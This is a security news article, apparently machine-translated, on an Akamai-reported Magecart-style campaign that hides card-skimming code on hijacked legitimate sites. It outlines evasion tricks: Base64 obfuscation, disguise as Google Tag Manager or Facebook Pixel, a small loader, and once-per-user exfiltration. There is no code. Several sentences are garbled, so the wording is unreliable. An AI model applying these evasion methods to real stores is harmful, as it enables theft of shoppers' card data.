Cybersecurity researchers have discovered a new Magecart-style web skimmer campaign in the works aimed at stealing personally identifiable information (PII) and credit card data from e-commerce websites.
A notable difference from other Magecart campaigns is that the hijacked site also acts as a “makeshift” command and control (C2) server, using its cover to deliver malicious intent without the victim site’s knowledge. is facilitating the distribution of code with
Web security firm Akamai has identified victims of varying sizes in North America, Latin America and Europe, putting the personal data of thousands of site visitors at risk of being collected and sold for illicit gain. said there may be.
“Attackers use many evasion techniques such as obfuscation during campaigns. [using] It uses Base64 and masks attacks to mimic popular third-party services such as Google Analytics and Google Tag Manager,” said Roman Lvovsky, a security researcher at Akamai.
The idea in a nutshell is to compromise legitimate vulnerable sites and use them to host web skimmer code, thereby leveraging the good reputation of legitimate domains. In some cases, the attacks have lasted her nearly a month.
“Instead of using the attacker’s own C2 servers to host malicious code that could be flagged as a malicious domain, an attacker could ) to hack vulnerable legitimate sites, such as small and medium-sized sites, by creating a scale retail website and hiding the code within it,” Akamai said.
Attacks result in two types of victims: legitimate sites compromised to act as “distribution centers” for malware, and vulnerable e-commerce websites targeted by skimmers.
In some cases, a website not only becomes a victim of data theft, but can also unknowingly serve as a vehicle for spreading malware to other susceptible websites.
“This attack included exploits for Magento, WooCommerce, WordPress and Shopify, revealing a growing range of vulnerabilities and exploits for digital commerce platforms,” said Lvovsky.
This technique leverages the established trust websites have earned over time to create a “smoke screen” that makes it difficult to identify and respond to such attacks.
🔐 Mastering API Security: Understanding Your True Attack Surface
Discover untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join us for an insightful webinar!
join the session
This campaign also employs other methods to avoid detection. This includes disguising the skimmer code as Google Tag his manager or third party his services such as Facebook Pixel to hide its true intentions.
Another trick employed is a JavaScript code snippet that acts as a loader and fetches the full attack code from the host victim’s website, minimizing the footprint and likelihood of detection. .
There are two different variants of the obfuscated skimmer code, which has the ability to intercept and exfiltrate PII and credit card details as encoded strings through HTTP requests to attacker-controlled servers. increase.
“Exfiltration only happens once per user who checks out,” said Lvovsky. “When a user’s information is stolen, the script flags the browser to prevent the information from being stolen twice from him (to reduce suspicious network traffic for him). This allows this Magecart Style attacks are more evasable.”
